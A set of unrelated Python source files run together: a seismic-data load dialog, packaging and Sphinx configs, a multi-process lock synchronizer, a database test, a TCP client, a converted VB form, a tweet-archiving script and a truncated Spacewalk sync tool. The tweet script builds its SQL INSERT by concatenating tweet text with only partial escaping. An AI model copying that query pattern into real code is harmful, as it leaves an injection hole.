# encoding: utf-8 ''' @author: Jose Emilio Romero Lopez @copyright: Copyright 2013-2014, Jose Emilio Romero Lopez. @license: GPL @contact: [email protected] This file is part of APASVO. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. ''' from PySide import QtGui from apasvo.gui.views.generated import ui_loaddialog from apasvo.utils.formats import rawfile FORMATS = {'Autodetect': None, 'Binary': rawfile.format_binary, 'Text': rawfile.format_text, } DEFAULT_FORMAT = 'Autodetect' DTYPES = (rawfile.datatype_int16, rawfile.datatype_int32, rawfile.datatype_int64, rawfile.datatype_float16, rawfile.datatype_float32, rawfile.datatype_float64, ) DTYPES_LABELS = ('16 bits, PCM', '32 bits, PCM', '64 bits, PCM', '16 bits, float', '32 bits, float', '64 bits, float', ) BYTEORDERS = (rawfile.byteorder_little_endian, rawfile.byteorder_big_endian) class LoadDialog(QtGui.QDialog, ui_loaddialog.Ui_LoadDialog): """A dialog window to load seismic data stored in a binary or text file. Allows the user to choose several settings in order to load a seismic signal, i.e.: Format: Binary or text format. Data-type: Float16, Float32 or Float64, Endianness: Little-endian or big-endian. Sample rate. The class also infers the right parameters for the chosen file and shows a preview of the loaded data for the selected parameters. Attributes: filename: Name of the opened file. """ def __init__(self, parent, filename): super(LoadDialog, self).__init__(parent) self.setupUi(self) self.FileFormatComboBox.currentIndexChanged.connect(self.on_format_change) self.FileFormatComboBox.currentIndexChanged.connect(self.load_preview) self.DataTypeComboBox.currentIndexChanged.connect(self.load_preview) self.ByteOrderComboBox.currentIndexChanged.connect(self.load_preview) # init file format combobox self.FileFormatComboBox.addItems(FORMATS.keys()) self.FileFormatComboBox.setCurrentIndex(FORMATS.keys().index(DEFAULT_FORMAT)) # init datatype combobox self.DataTypeComboBox.addItems(DTYPES_LABELS) self.DataTypeComboBox.setCurrentIndex(DTYPES.index(rawfile.datatype_float64)) self.filename = filename self.load_preview() def on_format_change(self, idx): """Updates UI after toggling the format value.""" fmt = FORMATS[self.FileFormatComboBox.currentText()] if fmt == rawfile.format_binary: self.DataTypeComboBox.setVisible(True) self.DataTypeLabel.setVisible(True) self.ByteOrderComboBox.setVisible(True) self.ByteOrderLabel.setVisible(True) self.groupBox_2.setVisible(True) self.SampleFrequencySpinBox.setVisible(True) self.SampleFrequencyLabel.setVisible(True) elif fmt == rawfile.format_text: self.DataTypeComboBox.setVisible(False) self.DataTypeLabel.setVisible(False) self.ByteOrderComboBox.setVisible(False) self.ByteOrderLabel.setVisible(False) self.groupBox_2.setVisible(True) self.SampleFrequencySpinBox.setVisible(True) self.SampleFrequencyLabel.setVisible(True) else: self.DataTypeComboBox.setVisible(False) self.DataTypeLabel.setVisible(False) self.ByteOrderComboBox.setVisible(False) self.ByteOrderLabel.setVisible(False) self.groupBox_2.setVisible(False) self.SampleFrequencySpinBox.setVisible(False) self.SampleFrequencyLabel.setVisible(False) self.groupBox.adjustSize() self.adjustSize() def load_preview(self): """Shows a preview of loaded data using the selected parameters.""" # Load parameters values = self.get_values() try: # Set up a file handler according to the type of raw data (binary or text) fhandler = rawfile.get_file_handler(self.filename, **values) # Print data preview array = fhandler.read_in_blocks().next() data = '' for x in array: data += ("%g\n" % x) except: data = '*** There was a problem reading the file content ***' self.buttonBox.button(QtGui.QDialogButtonBox.Ok).setEnabled(False) else: self.buttonBox.button(QtGui.QDialogButtonBox.Ok).setEnabled(True) self.PreviewTextEdit.clear() self.PreviewTextEdit.setText(data) def get_values(self): """Gets selected parameters.""" return {'fmt': FORMATS[self.FileFormatComboBox.currentText()], 'dtype': DTYPES[self.DataTypeComboBox.currentIndex()], 'byteorder': BYTEORDERS[self.ByteOrderComboBox.currentIndex()], 'fs': float(self.SampleFrequencySpinBox.value())}
# Copyright (c) 2011 Red Hat, Inc. # # This software is licensed to you under the GNU Lesser General Public # License as published by the Free Software Foundation; either version # 2 of the License (LGPLv2) or (at your option) any later version. # There is NO WARRANTY for this software, express or implied, # including the implied warranties of MERCHANTABILITY, # NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. You should # have received a copy of LGPLv2 along with this software; if not, see # http://www.gnu.org/licenses/old-licenses/lgpl-2.0.txt. # # Jeff Ortel <[email protected]> # from setuptools import setup, find_packages setup( name='gofer', version='3.0.0', description='Universal python agent', author='Jeff Ortel', author_email='[email protected]', url='https://github.com/jortel/gofer', license='GPLv2+', packages=find_packages(), scripts=[ '../bin/gofer', '../bin/goferd', ], include_package_data=False, data_files=[], classifiers=[ 'License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)', 'Programming Language :: Python', 'Operating System :: POSIX :: Linux', 'Topic :: System :: Distributed Computing', 'Topic :: Software Development :: Libraries :: Python Modules', 'Intended Audience :: Developers', 'Development Status :: 5 - Production/Stable', ], install_requires=[ ], )
# -*- coding: utf-8 -*- # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import os import sys sys.path.insert(0, os.path.abspath('../..')) # -- General configuration ---------------------------------------------------- # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = [ 'openstackdocstheme', 'sphinx.ext.autodoc', ] # autodoc generation is a bit aggressive and a nuisance when doing heavy # text edit cycles. # execute "export SPHINX_DEBUG=1" in your terminal to disable # The suffix of source filenames. source_suffix = '.rst' # The master toctree document. master_doc = 'index' # General information about the project. project = u'kolla' copyright = u'2013-present, OpenStack Foundation' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. from kolla.version import version_info as kolla_version # The full version, including alpha/beta/rc tags. release = kolla_version.version_string_with_vcs() # The short X.Y version. version = kolla_version.canonical_version_string() # If true, '()' will be appended to :func: etc. cross-reference text. add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). add_module_names = True # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # -- Options for HTML output -------------------------------------------------- # The theme to use for HTML and HTML Help pages. Major themes that come with # Sphinx are currently 'default' and 'sphinxdoc'. # html_theme_path = [] html_theme = 'openstackdocs' # html_static_path = ['static'] # Output file base name for HTML help builder. htmlhelp_basename = '%sdoc' % project # Must set this variable to include year, month, day, hours, and minutes. html_last_updated_fmt = '%Y-%m-%d %H:%M' # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, author, documentclass # [howto/manual]). latex_documents = [ ('index', '%s.tex' % project, u'%s Documentation' % project, u'OpenStack Foundation', 'manual'), ] # openstackdocstheme options repository_name = 'openstack/kolla' bug_project = 'kolla' bug_tag = ''
import os import time import glob import fcntl import errno from AdaptivePELE.utilities import utilities try: ProcessLookupError except NameError: ProcessLookupError = OSError class ProcessesManager: """ Object that sinchronizes multiple adaptivePELE instances, designed to be able to use multiple nodes of a gpu cluster """ RUNNING = "RUNNING" WAITING = "WAITING" INIT = "INIT" def __init__(self, output_path, num_replicas): self.syncFolder = os.path.join(os.path.abspath(output_path), "synchronization") utilities.makeFolder(self.syncFolder) self.lockFile = os.path.join(self.syncFolder, "syncFile.lock") self.pid = os.getpid() self.nReplicas = num_replicas self.id = None self.lockInfo = {} self.status = self.INIT self.sleepTime = 0.5 self.createLockFile() self.lock_available = True self.testLock() self.writeProcessInfo() self.initLockFile() self.syncStep = 0 def __len__(self): # define the size of the ProcessesManager object as the number of # processes return len(self.lockInfo) def testLock(self): """ Run a test to check if the file systems supports lockf and store it in the lock_available attribute """ file_lock = open(self.lockFile, "r+") try: fcntl.lockf(file_lock, fcntl.LOCK_EX) except (IOError, OSError) as exc: if exc.errno != errno.ENOLCK: raise # if only one replica is running we don't need synchronization, # so we can still run even if we are using a filesystem that # does not support lockf if self.nReplicas > 1: raise ValueError("There was a problem allocating a lock, this usually happens when the filesystem used does not support lockf, such as NFS") else: self.lock_available = False return self.lock_available = True def writeProcessInfo(self): """ Write the information of the running process to create the sync file """ with open(os.path.join(self.syncFolder, "%d.proc" % self.pid), "w") as fw: fw.write("%d\n" % self.pid) def createLockFile(self): """ Create the lock file """ try: # whith the flags set, if the file exists the open will fail fd = os.open(self.lockFile, os.O_CREAT | os.O_EXCL) os.close(fd) except OSError: return file_lock = open(self.lockFile, "w") file_lock.write("0\n") file_lock.close() def initLockFile(self): """ Initialize and write the information for the current process """ while True: processes = glob.glob(os.path.join(self.syncFolder, "*.proc")) processes.sort() if len(processes) > self.nReplicas: raise utilities.ImproperParameterValueException("More processors files than replicas found, this could be due to wrong number of replicas chosen in the control file or files remaining from previous that were not clean properly") if len(processes) != self.nReplicas: time.sleep(self.sleepTime) continue # only reach this block if all processes have written their own # files for i, process_file in enumerate(processes): process = int(os.path.splitext(os.path.split(process_file)[1])[0]) self.lockInfo[process] = (i, set([self.status])) if process == self.pid: self.id = i break file_lock = open(self.lockFile, "r+") while True: if self.lock_available: # if the filesystem does not support locks but only one replica # is running we will use no locks fcntl.lockf(file_lock, fcntl.LOCK_EX) if self.isMaster(): self.writeLockInfo(file_lock) if self.lock_available: fcntl.lockf(file_lock, fcntl.LOCK_UN) file_lock.close() return else: lock_info = self.getLockInfo(file_lock) if self.lock_available: fcntl.lockf(file_lock, fcntl.LOCK_UN) # ensure that all process are created before continuing if sorted(list(lock_info)) == sorted(list(self.lockInfo)): file_lock.close() return def getLockInfo(self, file_descriptor): """ Return the info stored in the lock file :param file_descriptor: File object of the lock file :type file_descriptor: file :returns: dict -- A dictonary containing the information of the different process managers initialized """ info = {} file_descriptor.seek(0) for line in file_descriptor: if line == "0\n": break pid, id_num, label = line.rstrip().split(":") info[int(pid)] = (int(id_num), set(label.split(";"))) return info def writeLockInfo(self, file_descriptor): """ Write the lock info to the lock file :param file_descriptor: File object of the lock file :type file_descriptor: file """ file_descriptor.seek(0) for pid, data in self.lockInfo.items(): id_num, status_set = data file_descriptor.write("%d:%d:%s\n" % (pid, id_num, ";".join(status_set))) file_descriptor.truncate() def isMaster(self): """ Return wether the current process is the master process :returns: bool -- Whether the current process is master """ return self.id == 0 def setStatus(self, status): """ Set the current status of the process :param status: Status of the process (INIT, WAITING or RUNNING) :type status: str """ self.status = status file_lock = open(self.lockFile, "r+") if self.lock_available: fcntl.lockf(file_lock, fcntl.LOCK_EX) self.lockInfo = self.getLockInfo(file_lock) self.lockInfo[self.pid][1].add(self.status) self.writeLockInfo(file_lock) if self.lock_available: fcntl.lockf(file_lock, fcntl.LOCK_UN) file_lock.close() def getStatus(self): """ Return the current status of the process :returns: str -- Status of the process """ return self.status def isSynchronized(self, status): """ Return wether all processes are synchronized, that is, they all have the same status :param status: Status of the process (INIT, WAITING or RUNNING) :type status: str :returns: bool -- Whether all processes are synchronized """ assert len(self.lockInfo) > 0, "No processes found in lockInfo!!!" for pid in self.lockInfo: if status not in self.lockInfo[pid][1]: return False return True def synchronize(self, status): """ Create a barrier-like situation to wait for all processes to finish """ while True: if self.isSynchronized(status): return file_lock = open(self.lockFile, "r+") if self.lock_available: fcntl.lockf(file_lock, fcntl.LOCK_EX) self.lockInfo = self.getLockInfo(file_lock) if self.lock_available: fcntl.lockf(file_lock, fcntl.LOCK_UN) file_lock.close() def allRunning(self): """ Check if all processes are still running """ for pid in self.lockInfo: try: os.kill(pid, 0) except ProcessLookupError: utilities.print_unbuffered("Process %d not found!!!" % pid) return False return True def writeEquilibrationStructures(self, path, structures): """ Write the equilibration structures for the current replica :param path: Path where to write the structures :type path: str :param structures: Filename with the structures :type structures: list """ outfile = os.path.join(path, "structures_equilibration_%d.txt" % self.id) with open(outfile, "w") as fw: fw.write(",".join(structures)) def readEquilibrationStructures(self, path): """ Read the equilibration structures for all replicas :param path: Path from where to read the structures :type path: str """ files = glob.glob(os.path.join(path, "structures_equilibration_*.txt")) assert len(files) == self.__len__(), "Missing files for some of the replicas" structures = [] for i in range(self.__len__()): with open(os.path.join(path, "structures_equilibration_%d.txt" % i)) as fr: structure_partial = fr.read().rstrip().split(",") if structure_partial != [""]: structures.extend(structure_partial) return structures def getStructureListPerReplica(self, initialStructures, trajsPerReplica): """ Filter the list of initial structures to select only the ones corresponding to the current replica :param initialStructures: Name of the initial structures to copy :type initialStructures: list of str :param trajsPerReplica: Number of trajectories that each replica has to calculate :type trajsPerReplica: int :returns: list -- List with a tuple containing the initial structures of the replica and their indices """ n_structures = len(initialStructures) end = min(n_structures, (self.id+1)*trajsPerReplica) return [(i, initialStructures[i]) for i in range(self.id*trajsPerReplica, end)] def getBarrierName(self): """ Create a unique status name so that every time we synchronize we do it under a different name """ self.syncStep += 1 return "%s-%d" % (self.WAITING, self.syncStep) def barrier(self): """ Create a barrier """ status = self.getBarrierName() self.setStatus(status) self.synchronize(status)
""" Copyright (c) 2004-Present Pivotal Software, Inc. This program and the accompanying materials are made available under the terms of the under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from gppylib.db import dbconn from tinctest import TINCTestCase from mpp.models import SQLTestCase import mpp.gpdb.tests.storage.walrepl.lib from mpp.gpdb.tests.storage.walrepl.run import StandbyRunMixin import subprocess class SQLwithStandby(StandbyRunMixin, SQLTestCase): """ This test case is a template to peform SQL while standby is running. We don't connect to standby, but just see the primary's behavior. For standby's correctness, see promote test cases. @gucs gp_create_table_random_default_distribution=off """ sql_dir = 'sql' ans_dir = 'ans' out_dir = 'output' def run_test(self): """ Override SQLTestCase method. Create a standby and run SQL. """ sql_file = self.sql_file ans_file = self.ans_file self.assertEqual(self.standby.create(), 0) res = self.standby.start() self.assertTrue(res.wasSuccessful()) # wait for the walreceiver to start num_walsender = self.wait_for_walsender() self.assertEqual(num_walsender, 1) result = super(SQLwithStandby, self).run_test() return result class ShutdownTestCase(StandbyRunMixin, TINCTestCase): def test_smartshutdown(self): """ @description smartshutdown should be able to stop standby replay. @tags sanity """ res = self.standby.create() self.assertEqual(res, 0) res = self.standby.start() self.assertTrue(res.wasSuccessful()) # wait for the walreceiver to start num_walsender = self.wait_for_walsender() self.assertEqual(num_walsender, 1) proc = subprocess.Popen(['pg_ctl', '-D', self.standby_datadir, 'stop'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = proc.communicate() self.assertEqual(proc.returncode, 0) return True
#!/usr/bin/env python3 #coding=utf-8 ## 安装和初始化网站的数据库 import sys,model,json,utils def dumpVersion2Json(modname, wid): _info = model.get_rom_by_wid(wid) result ={} if(_info): _vid = _info['version'] _dumpfilename = 'static/downloads/'+modname+'/uinfo_'+ _vid +'.json' result = json.dumps(_info,ensure_ascii=False) utils.saveBin(_dumpfilename,result) print('Dumping products..:',wid, _dumpfilename) return result def upgrade_dump_json_all(): _alldev = model.get_devices() for dev in _alldev: _modname = dev['m_device'] _detail = model.get_roms_by_devicesname(_modname,-1) if _detail: for post in _detail: dumpVersion2Json(_modname, post['id']) def main(): print('''useage: \n ----"install.py install" to initiate the databases \r\n ----"install.py upgrade" to upgrade the databases \r\nAfter that, run "python server.py 18080" to start web server \r\n ''') if len(sys.argv)>1: if (sys.argv[1] == "install"): model.installmain() exit() elif (sys.argv[1] == "upgrade"): upgrade_dump_json_all() exit() if __name__ =='__main__': main()
from distutils.core import setup import sys import os import re PACKAGENAME = 'varsim' packageDir = os.path.join(os.path.dirname(os.path.abspath(__file__)), PACKAGENAME) versionFile = os.path.join(packageDir, 'version.py') # Obtain the package version with open(versionFile, 'r') as f: s = f.read() # Look up the string value assigned to __version__ in version.py using regexp versionRegExp = re.compile("__VERSION__ = \"(.*?)\"") # Assign to __version__ __version__ = versionRegExp.findall(s)[0] print(__version__) setup(# package information name=PACKAGENAME, version=__version__, description='A package to simulate observations of variable sources over large areas of the sky', long_description=''' ''', # What code to include as packages packages=[PACKAGENAME], packagedir={PACKAGENAME: 'varsim'}, # What data to include as packages include_package_data=True, package_data={PACKAGENAME:['example_data/example_pointings.csv']} )
""" Simple TCP/IP Client to interface with Denis Dube, Summer 2005 """ from socket import AF_INET, SOCK_STREAM, socket import os from threading import Thread from AbstractClient import AbstractClient class TcpClient(AbstractClient): def __init__(self, serverIP='127.0.0.1', serverPort=14059, debug=True): self.serverIP = serverIP self.serverPort = serverPort self.debug = debug self.sock = None def connect(self): """ Establishes a TCP/IP connection to self.serverIP on self.serverPort """ self.sock = socket(AF_INET, SOCK_STREAM) try: self.sock.connect((self.serverIP, self.serverPort)) except: print 'Could not connect to QOCA at',self.serverIP, self.serverPort print 'QOCA connection failed in', __file__ return False input = self.read() input = input.strip() input = input.strip('\n') status, count = input.split(';') if( status == 'BUSY' ): print 'ERROR: QOCA server is too busy at IP:',self.serverIP, \ 'Port:',self.serverPort print 'QOCA server has',count, 'simultaneous connections currently' print 'QOCA connection failed in', __file__ return False elif( self.debug ): print 'TCP/IP socket connection established with', self.sock.getpeername() print 'Server status message:',status print 'Server load:',int(count)+1,'\n' return True def read(self): """ Reads one newline terminated string from the socket Blocks until newline reached Returns the string if successful, returns None on error """ buffer = '' while( 1 ): try: buffer += self.sock.recv(32) except: return None if( buffer[-1] == '\n' ): break return buffer def write(self, message): """ Sends out message to the socket If it is Returns length of message sent on success, None on error """ sentLen = 0 totalLen = len(message) while( sentLen < totalLen ): try: sentLen += self.sock.send(message) except: return None return sentLen def disconnect(self): """ Close the TCP/IP socket connection if it exists Return True if close worked, None if could not close, False if nothing to close """ if( self.sock ): try: self.write("") # This should do the trick... except: raise try: self.sock.close() return True except: return None return False
# Created by Leo from: C:\Development\Python23\Lib\site-packages\vb2py\vb2py.leo """The main form for the application""" from PythonCardPrototype import model # Allow importing of our custom controls import PythonCardPrototype.res PythonCardPrototype.res.APP_COMPONENTS_PACKAGE = "vb2py.targets.pythoncard.vbcontrols" class Background(model.Background): def __getattr__(self, name): """If a name was not found then look for it in components""" return getattr(self.components, name) def __init__(self, *args, **kw): """Initialize the form""" model.Background.__init__(self, *args, **kw) # Call the VB Form_Load # TODO: This is brittle - depends on how the private indicator is set if hasattr(self, "_MAINFORM__Form_Load"): self._MAINFORM__Form_Load() elif hasattr(self, "Form_Load"): self.Form_Load() from vb2py.vbfunctions import * from vb2py.vbdebug import * import Globals class MAINFORM(Background): def on_Command4_mouseClick(self, *args): self.Combo1.Visible = not self.Combo1.Visible def on_Command5_mouseClick(self, *args): self.Combo1.Left = self.Combo1.Left + 50 self.Combo1.Top = self.Combo1.Top + 50 def on_Command6_mouseClick(self, *args): self.Combo1.Width = self.Combo1.Width + 50 def on_Command7_mouseClick(self, *args): self.Combo1.Enabled = not self.Combo1.Enabled def on_Combo1_textUpdate(self, *args): Globals.Log('Change, \'' + self.Combo1.Text + '\'') def on_Combo1_mouseClick(self, *args): Globals.Log('Click') def on_Combo1_mouseDoubleClick(self, *args): Globals.Log('DblClick') def on_Combo1_gainFocus(self, *args): Globals.Log('GotFocus') def on_Combo1_keyDown_NOTSUPPORTED(self, *args): Globals.Log('Keydown' + ', ' + Str(KeyCode) + ', ' + Str(Shift)) def on_Combo1_keyPress_NOTSUPPORTED(self, *args): Globals.Log('KeyPress' + ', ' + Str(KeyCode) + ', ' + Str(Shift) + ', ' + self.Combo1.Text) def on_Combo1_keyUp_NOTSUPPORTED(self, *args): Globals.Log('KeyUp' + ', ' + Str(KeyCode) + ', ' + Str(Shift)) def on_Combo1_loseFocus(self, *args): Globals.Log('LostFocus') def on_Combo1_mouseDown(self, *args): Button, Shift, X, Y = vbGetEventArgs(["ButtonDown()", "ShiftDown()", "x", "y"], args) Globals.Log('MouseDown' + Str(Button) + ', ' + Str(Shift) + ', ' + Str(X) + ', ' + Str(Y)) def on_Combo1_mouseMove(self, *args): Button, Shift, X, Y = vbGetEventArgs(["ButtonDown()", "ShiftDown()", "x", "y"], args) Globals.Log('MouseMove' + Str(Button) + ', ' + Str(Shift) + ', ' + Str(X) + ', ' + Str(Y)) def on_Combo1_mouseUp(self, *args): Button, Shift, X, Y = vbGetEventArgs(["ButtonDown()", "ShiftDown()", "x", "y"], args) Globals.Log('MouseUp' + Str(Button) + ', ' + Str(Shift) + ', ' + Str(X) + ', ' + Str(Y)) def on_cmdAdd_mouseClick(self, *args): self.Combo1.AddItem('Item ' + Str(self.Combo1.ListCount + 1)) def on_cmdAddFirst_mouseClick(self, *args): self.Combo1.AddItem('First ' + Str(self.Combo1.ListCount), 0) def on_cmdClear_mouseClick(self, *args): self.Combo1.Clear() def on_cmdDump_mouseClick(self, *args): for i in vbForRange(0, self.Combo1.ListCount - 1): Debug.Print(i, self.Combo1.List(i)) def on_Delete_mouseClick(self, *args): self.Combo1.RemoveItem(self.Combo1.ListIndex) # VB2PY (UntranslatedCode) Attribute VB_Name = "frmComboBox" # VB2PY (UntranslatedCode) Attribute VB_GlobalNameSpace = False # VB2PY (UntranslatedCode) Attribute VB_Creatable = False # VB2PY (UntranslatedCode) Attribute VB_PredeclaredId = True # VB2PY (UntranslatedCode) Attribute VB_Exposed = False if __name__ == '__main__': app = model.PythonCardApp(MAINFORM) app.MainLoop()
import mysql.connector, pprint, tweepy, json, time from constants import * from mysql.connector import errorcode # Import authentication credentials from "keys.json" file try: keys = json.load(open("keys.json")) print("Keys located...\n") except: print("Unable to locate keys") # Authenticate auth = tweepy.OAuthHandler(keys['consumer_key'], keys['consumer_secret']) auth.set_access_token(keys['access_token'], keys['access_token_secret']) #Create API connection try: api = tweepy.API(auth) print("API connection secured...\n") except: print("Unable to make API connection") s = api.search(QUERY_STRING) newTweets = [] for n in s: newTweets.append(str(n.id)) try: tweet = api.get_status(n.id) except: print("No tweet found with ID: " + str(n.id)) cnx = mysql.connector.connect(user=MYSQL_USER, password=MYSQL_PASSWORD, host='localhost', database='wonders', port=3306) cursor = cnx.cursor() dateCreated = tweet._json['created_at'][-4:]+ "-04-" + tweet._json['created_at'][8:10] wonderText = tweet._json['text'].replace("\"","\\\"") wonderer = tweet._json['user']['screen_name'] id = tweet._json['id'] resolved = 1 if "!give" in wonderText and "!take" in wonderText: commandType = "'jerk'" elif "!give" in wonderText: commandType = "'give'" elif "!take" in wonderText: commandType = "'take'" else: commandType = "'none'" query = ("INSERT INTO wonders (date_created, wonder_text, wonderer, resolved, command_type, id) VALUES (\"" + dateCreated + "\", \"" + wonderText + "\", \"" + wonderer + "\", " + str(resolved) + ", " + commandType + ", " + str(id) + ")") print(query) cursor.execute(query) cnx.commit() cursor.close() cnx.close()
# # Copyright (c) 2008--2014 Red Hat, Inc. # # This software is licensed to you under the GNU General Public License, # version 2 (GPLv2). There is NO WARRANTY for this software, express or # implied, including the implied warranties of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2 # along with this software; if not, see # http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt. # # Red Hat trademarks are not licensed under GPLv2. No permission is # granted to use or replicate Red Hat trademarks that are incorporated # in this software or its documentation. # # Spacewalk Incremental Synchronization Tool # main function. # __lang. imports__ import datetime import os import sys import stat import time import types import exceptions import Queue import threading from optparse import Option, OptionParser from rhn.connections import idn_ascii_to_pune, idn_pune_to_unicode import gettext translation = gettext.translation('spacewalk-backend-server', fallback=True) _ = translation.ugettext # __rhn imports__ from spacewalk.common import rhnMail, rhnLib, rhnFlags from spacewalk.common.rhnLog import initLOG from spacewalk.common.rhnConfig import CFG, initCFG, PRODUCT_NAME from spacewalk.common.rhnTB import exitWithTraceback sys.path.append("/usr/share/rhn") from up2date_client import config from spacewalk.common.checksum import getFileChecksum from spacewalk.server import rhnSQL from spacewalk.server.rhnSQL import SQLError, SQLSchemaError, SQLConnectError from spacewalk.server.rhnServer import satellite_cert from spacewalk.server.rhnLib import get_package_path from spacewalk.common import fileutils initCFG('server.satellite') initLOG(CFG.LOG_FILE, CFG.DEBUG) # __rhn sync/import imports__ import xmlWireSource import xmlDiskSource from progress_bar import ProgressBar from xmlSource import FatalParseException, ParseException from diskImportLib import rpmsPath from syncLib import log, log2, log2disk, log2stderr, log2email from syncLib import RhnSyncException, RpmManip, ReprocessingNeeded from syncLib import initEMAIL_LOG, dumpEMAIL_LOG from syncLib import FileCreationError, FileManip from SequenceServer import SequenceServer from spacewalk.server.importlib.errataCache import schedule_errata_cache_update from spacewalk.server.importlib.importLib import InvalidChannelFamilyError from spacewalk.server.importlib.importLib import MissingParentChannelError from spacewalk.server.importlib.importLib import get_nevra, get_nevra_dict import satCerts import req_channels import messages import sync_handlers import constants _DEFAULT_SYSTEMID_PATH = '/etc/sysconfig/rhn/systemid' _DEFAULT_RHN_ENTITLEMENT_CERT_BACKUP = '/etc/sysconfig/rhn/rhn-entitlement-cert.xml' DEFAULT_ORG = 1 # the option object is used everywhere in this module... make it a # global so we don't have to pass it to everyone. OPTIONS = None # pylint: disable=W0212 class Runner: step_precedence = { 'packages': ['download-packages'], 'source-packages': ['download-source-packages'], 'errata': ['download-errata'], 'kickstarts': ['download-kickstarts'], 'rpms': [''], 'srpms': [''], 'channels': ['channel-families'], 'channel-families': [''], 'short': [''], 'download-errata': ['errata'], 'download-packages': [''], 'download-source-packages': [''], 'download-kickstarts': [''], 'arches': [''], # 5/26/05 wregglej 156079 Added arches to precedence list. 'orgs': [''], } # The step hierarchy. We need access to it both for command line # processing and for the actions themselves step_hierarchy = [ 'orgs', 'channel-families', 'arches', 'channels', 'short', 'download-packages', 'rpms', 'packages', 'srpms', 'download-source-packages', 'download-errata', 'download-kickstarts', 'source-packages', 'errata', 'kickstarts', ] def __init__(self): self.syncer = None self.packages_report = None self._xml_file_dir_error_message = '' self._affected_channels = None self._packages_report = None self._actions = None # 5/24/05 wregglej - 156079 turn off a step's dependents in the step is turned off. def _handle_step_dependents(self, actionDict, step): ad = actionDict if ad.has_key(step): # if the step is turned off, then the steps that are dependent on it have to be turned # off as well. if ad[step] == 0: ad = self._turn_off_dependents(ad, step) # if the step isn't in the actionDict, then it's dependent actions must be turned off. else: ad = self._turn_off_dependents(ad, step) return ad # 5/24/05 wregglej - 156079 actually turns off the dependent steps, which are listed in the step_precedence # dictionary. def _turn_off_dependents(self, actionDict, step): ad = actionDict for dependent in self.step_precedence[step]: if ad.has_key(dependent): ad[dependent] = 0 return ad def main(self): """Main routine: commandline processing, etc...""" # let's time the whole process timeStart = time.time() actionDict, channels = processCommandline() # 5/24/05 wregglej - 156079 turn off an step's dependent steps if it's turned off. # look at self.step_precedence for a listing of how the steps are dependent on each other. for st in self.step_hierarchy: actionDict = self._handle_step_dependents(actionDict, st) self._actions = actionDict # 5/26/05 wregglej - 156079 have to handle the list-channels special case. if actionDict.has_key('list-channels'): if actionDict['list-channels'] == 1: actionDict['channels'] = 1 actionDict['arches'] = 0 actionDict['channel-families'] = 1 channels = [] # create and set permissions for package repository mountpoint. _verifyPkgRepMountPoint() if OPTIONS.email: initEMAIL_LOG() # init the synchronization processor self.syncer = Syncer(channels, actionDict['list-channels'], actionDict['rpms'], forceAllErrata=actionDict['force-all-errata']) try: self.syncer.initialize() except (KeyboardInterrupt, SystemExit): raise except xmlWireSource.rpclib.xmlrpclib.Fault, e: if CFG.ISS_PARENT: if CFG.PRODUCT_NAME == 'Spacewalk': log(-1, ['', messages.sw_iss_not_available % e.faultString], ) else: log(-1, ['', messages.sat_iss_not_available % e.faultString], ) sys.exit(26) else: log(-1, ['', messages.syncer_error % e.faultString], ) sys.exit(9) except Exception, e: # pylint: disable=E0012, W0703 log(-1, ['', messages.syncer_error % e], ) sys.exit(10) log(1, ' db: %s/<password>@%s' % (CFG.DB_USER, CFG.DB_NAME)) selected = [action for action in actionDict.keys() if actionDict[action]] log2(-1, 3, "Action list/commandline toggles: %s" % repr(selected), stream=sys.stderr) if OPTIONS.mount_point: self._xml_file_dir_error_message = messages.file_dir_error % \ OPTIONS.mount_point for _try in range(2): try: for step in self.step_hierarchy: if not actionDict[step]: continue method_name = '_step_' + step.replace('-', '_') if not hasattr(self, method_name): log(-1, _("No handler for step %s") % step) continue method = getattr(self, method_name) ret = method() if ret: sys.exit(ret) else: # for # Everything went fine break except ReprocessingNeeded: # Try one more time - this time it should be faster since # everything should be cached log(1, _('Environment changed, trying again...')) continue except RhnSyncException: rhnSQL.rollback() raise else: log(1, _('Repeated failures')) timeEnd = time.time() delta_str = self._get_elapsed_time(timeEnd - timeStart) log(1, _("""\ Import complete: Begin time: %s End time: %s Elapsed: %s """) % (formatDateTime(dt=time.localtime(timeStart)), formatDateTime(dt=time.localtime(timeEnd)), delta_str), cleanYN=1) # mail out that log if appropriate sendMail() return 0 @staticmethod def _get_elapsed_time(elapsed): elapsed = int(elapsed) hours = elapsed / 60 / 60 mins = elapsed / 60 - hours * 60 secs = elapsed - mins * 60 - hours * 60 * 60 delta_list = [[hours, _("hours")], [mins, _("minutes")], [secs, _("seconds")]] delta_str = ", ".join(["%s %s" % (l[0], l[1]) for l in delta_list]) return delta_str def _run_syncer_step(self, function, step_name): """ Runs a function, and catches the most common error cases """ try: ret = function() except (xmlDiskSource.MissingXmlDiskSourceDirError, xmlDiskSource.MissingXmlDiskSourceFileError), e: log(-1, self._xml_file_dir_error_message + '\n 